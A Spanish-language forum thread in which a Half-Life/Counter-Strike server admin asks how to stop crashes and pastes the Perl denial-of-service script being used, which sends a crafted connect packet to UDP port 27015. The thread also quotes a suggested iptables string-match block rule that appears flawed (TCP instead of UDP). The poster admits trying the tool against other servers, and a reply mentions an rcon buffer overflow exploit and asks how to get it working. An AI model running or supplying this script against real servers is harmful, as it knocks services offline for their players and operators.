Buen les comento, tengo un servidor y por este exploit que abajo está me lo tiran abajo, y practicamente a la gente le sacan las ganas de jugar xq terminan saliendo todos del mismo. Los servidores no estan en linux, quisiera saber si hay alguna forma de solucionar esto xq me stoy volviendo loco, el servidor es no steam, probe tirar en general para ver como funcionaba y sin embargo habian servidores que no me dejaba tirar es decir me dice que no tengo autorizacion. Buen abajo lo dejo a ver si alguien tiene una posible solucion. Saludos
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
Un conocido me dijo que use iptables para filtrar las conexiones que manden ese string, osea yo 0 idea de esto.
en teoria me dijeron que tendria que ser algo asi:
iptables -t filter -A INPUT -i $INTERFAZ -p tcp -d $IP --dport $PUERTO -m string --string "connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0" -j DROP
------------------------------------------------
Post por: BenRu
He estado mirando acerca del exploit, y te va a costar un poco de trabajo xD
Half Life (rcon) Remote Buffer Overflow Exploit
Alguna idea chicos? yo ni idea, necesitaria una forma de como ponerlo en funcionamiento si es que alguien tiene una ida.

Autor